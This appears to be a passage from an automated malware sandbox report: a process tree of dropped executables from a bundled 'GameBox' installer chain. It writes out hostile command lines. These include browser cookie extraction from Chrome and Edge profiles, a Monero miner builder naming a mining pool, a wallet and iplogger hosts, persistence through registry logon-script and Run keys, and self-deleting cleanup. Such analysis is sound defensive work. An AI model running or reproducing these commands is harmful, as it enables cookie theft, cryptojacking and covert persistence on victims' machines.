C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"3⤵PID:5240
-
-
-
C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:856 -
C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"C:\Users\Admin\Documents\tdLynNSjWDwoYV_NtVV9prtL.exe"3⤵
- Executes dropped EXE
PID:2616
-
-
-
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe"C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe"2⤵
- Executes dropped EXE
PID:804 -
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exeC:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe3⤵
- Executes dropped EXE
PID:3192
-
-
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exeC:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe3⤵PID:3912
-
-
C:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exeC:\Users\Admin\Documents\DBquM9Ux3O2P6QTSM7bEyIJg.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
-
C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe"C:\Users\Admin\Documents\RAGsMRiGvQfHKGxdA_XdEHZ4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe"C:\Users\Admin\Documents\0ZvtfMMtmei_r2LUhzD6s3nl.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe"C:\Users\Admin\Documents\PegYFqmYOCQQpBeo47YBAEF5.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe"C:\Users\Admin\Documents\gjBZerm3X6OG0IODIHvioyga.exe"2⤵
- Executes dropped EXE
PID:508
-
-
C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe"C:\Users\Admin\Documents\tDNpWE8Ffr9I95g5rfOORzaj.exe"2⤵
- Executes dropped EXE
PID:512
-
-
C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe"C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:420 -
C:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exeC:\Users\Admin\Documents\xuPTrPhG8LiTCCYkRU3l5dJn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe"C:\Users\Admin\Documents\3IjmjaZKIJmptGbbtw1_D26A.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe"C:\Users\Admin\Documents\tFAiejrvGkLA09uKG9VYjzE9.exe"2⤵
- Executes dropped EXE
PID:4256
-
-
C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe"C:\Users\Admin\Documents\KxuucbJ_95kucQ9ETFrE7iPJ.exe"2⤵
- Executes dropped EXE
PID:4228 -
C:\Users\Admin\AppData\Roaming\2305080.exe"C:\Users\Admin\AppData\Roaming\2305080.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Users\Admin\AppData\Roaming\3814353.exe"C:\Users\Admin\AppData\Roaming\3814353.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:804 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:1128
-
-
-
C:\Users\Admin\AppData\Roaming\7330230.exe"C:\Users\Admin\AppData\Roaming\7330230.exe"3⤵
- Executes dropped EXE
PID:4040
-
-
C:\Users\Admin\AppData\Roaming\2732743.exe"C:\Users\Admin\AppData\Roaming\2732743.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
-
C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe"C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe"2⤵
- Executes dropped EXE
PID:1812 -
C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe"C:\Users\Admin\Documents\AK8bFJ2kMHwvSgaE68geOqWe.exe" -q3⤵
- Executes dropped EXE
PID:3152
-
-
-
C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe"C:\Users\Admin\Documents\4RzU7BiBxmLwffxRvpEDiZSm.exe"2⤵
- Executes dropped EXE
PID:1904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 7603⤵
- Program crash
PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 8123⤵
- Program crash
PID:5840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 7923⤵
- Program crash
PID:5972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 8283⤵
- Program crash
PID:1300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 9523⤵
- Program crash
PID:5404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 9843⤵
- Program crash
PID:5552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 10923⤵
- Program crash
PID:3124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 13603⤵
- Program crash
PID:5704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 13283⤵
- Program crash
PID:5704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 14843⤵
- Program crash
PID:6812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 15723⤵
- Program crash
PID:6492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 9003⤵
- Program crash
PID:7328
-
-
-
C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"2⤵
- Executes dropped EXE
PID:2732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 3883⤵
- Program crash
PID:5784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 4243⤵
- Program crash
PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 4803⤵
- Program crash
PID:5156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 6203⤵
- Program crash
PID:4332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 6603⤵
- Program crash
PID:3312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 6963⤵
- Program crash
PID:5572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 5883⤵
- Program crash
PID:6596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 7083⤵
- Program crash
PID:6152
-
-
C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"C:\Users\Admin\Documents\7XRd6tmNRnvpvvsD9uVr8_2e.exe"3⤵PID:10912
-
-
-
C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe"C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe"2⤵
- Executes dropped EXE
PID:2200 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6743681585.exe"3⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\6743681585.exe"C:\Users\Admin\AppData\Local\Temp\6743681585.exe"4⤵PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8690626576.exe"3⤵PID:7412
-
C:\Users\Admin\AppData\Local\Temp\8690626576.exe"C:\Users\Admin\AppData\Local\Temp\8690626576.exe"4⤵PID:8080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 7565⤵
- Program crash
PID:8288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 7645⤵
- Program crash
PID:8632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 7685⤵
- Program crash
PID:8824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 8925⤵
- Program crash
PID:6864
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f & erase "C:\Users\Admin\Documents\ch4sEc_fJpwjttkGs9QqTu4a.exe" & exit3⤵PID:7780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ch4sEc_fJpwjttkGs9QqTu4a.exe" /f4⤵
- Executes dropped EXE
- Kills process with taskkill
PID:3836
-
-
-
-
C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe"C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe"2⤵
- Executes dropped EXE
PID:744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f & erase "C:\Users\Admin\Documents\Dz6v9cEoKfJYRw032bIvHe6r.exe" & exit3⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Dz6v9cEoKfJYRw032bIvHe6r.exe" /f4⤵
- Kills process with taskkill
PID:5432
-
-
-
-
C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe"C:\Users\Admin\Documents\RP11pnadhhUPl610oidJj8MQ.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4420 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6192
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6988
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:7144
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6292
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6548
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7248
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:7608
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵PID:4584
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7692
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10408
-
-
-
-
C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe"C:\Users\Admin\Documents\XeZ3UVKJj0F8nD1ajWBiOWIQ.exe"2⤵
- Executes dropped EXE
PID:4416
-
-
C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe"C:\Users\Admin\Documents\VO49JLlC8_Np40dUNpo8MwXg.exe"2⤵
- Executes dropped EXE
PID:3860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 7123⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 6443⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 10763⤵
- Program crash
PID:6020
-
-
-
C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe"C:\Users\Admin\Documents\gd6uGJvHfRYMrGagBQn0wl2K.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"2⤵
- Executes dropped EXE
PID:3796 -
C:\Users\Admin\AppData\Local\Temp\is-DE0VM.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp"C:\Users\Admin\AppData\Local\Temp\is-DE0VM.tmp\Eug40X9J7YAE5ZHuGHmAbQnS.tmp" /SL5="$3014A,138429,56832,C:\Users\Admin\Documents\Eug40X9J7YAE5ZHuGHmAbQnS.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\is-BJ10D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BJ10D.tmp\Setup.exe" /Verysilent4⤵PID:6124
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\is-6MOF2.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-6MOF2.tmp\Stats.tmp" /SL5="$202EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\is-33AUJ.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-33AUJ.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵PID:4148
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\is-8K9NM.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-8K9NM.tmp\Inlog.tmp" /SL5="$20282,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:6900
-
C:\Users\Admin\AppData\Local\Temp\is-E09QL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-E09QL.tmp\Setup.tmp" /SL5="$50218,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:1424
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4228 -
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵PID:8268
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:9704
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:9924
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:5652
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:10540
-
-
C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler"9⤵PID:10672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler.exe"10⤵PID:5216
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:2044
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 7566⤵
- Program crash
PID:1544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 8086⤵
- Program crash
PID:7344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 8206⤵
- Program crash
PID:7096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 9606⤵
- Program crash
PID:7792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 9886⤵
- Program crash
PID:7432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 10446⤵
- Program crash
PID:7608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 13406⤵
- Program crash
PID:6804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 12846⤵
- Program crash
PID:6784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 14046⤵
- Program crash
PID:9108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 13566⤵
- Program crash
PID:8516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 15726⤵
- Program crash
PID:6096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 16166⤵
- Program crash
PID:2288
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵PID:5568
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:7364
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\is-SULSU.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-SULSU.tmp\WEATHER Manager.tmp" /SL5="$202FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵PID:2656
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:1196
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\is-926O1.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-926O1.tmp\VPN.tmp" /SL5="$2025C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe" /silent /subid=7207⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\is-8GCSB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GCSB.tmp\Setup.tmp" /SL5="$3025A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe" /silent /subid=7208⤵PID:7256
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:7760
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:5984
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵PID:6028
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵PID:8652
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵PID:7692
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4256 -
C:\Users\Admin\AppData\Roaming\8251980.exe"C:\Users\Admin\AppData\Roaming\8251980.exe"6⤵PID:7356
-
-
C:\Users\Admin\AppData\Roaming\6500212.exe"C:\Users\Admin\AppData\Roaming\6500212.exe"6⤵PID:7452
-
-
C:\Users\Admin\AppData\Roaming\6474422.exe"C:\Users\Admin\AppData\Roaming\6474422.exe"6⤵PID:7680
-
-
C:\Users\Admin\AppData\Roaming\4494234.exe"C:\Users\Admin\AppData\Roaming\4494234.exe"6⤵PID:7668
-
-
C:\Users\Admin\AppData\Roaming\2792351.exe"C:\Users\Admin\AppData\Roaming\2792351.exe"6⤵PID:7420
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5684
-
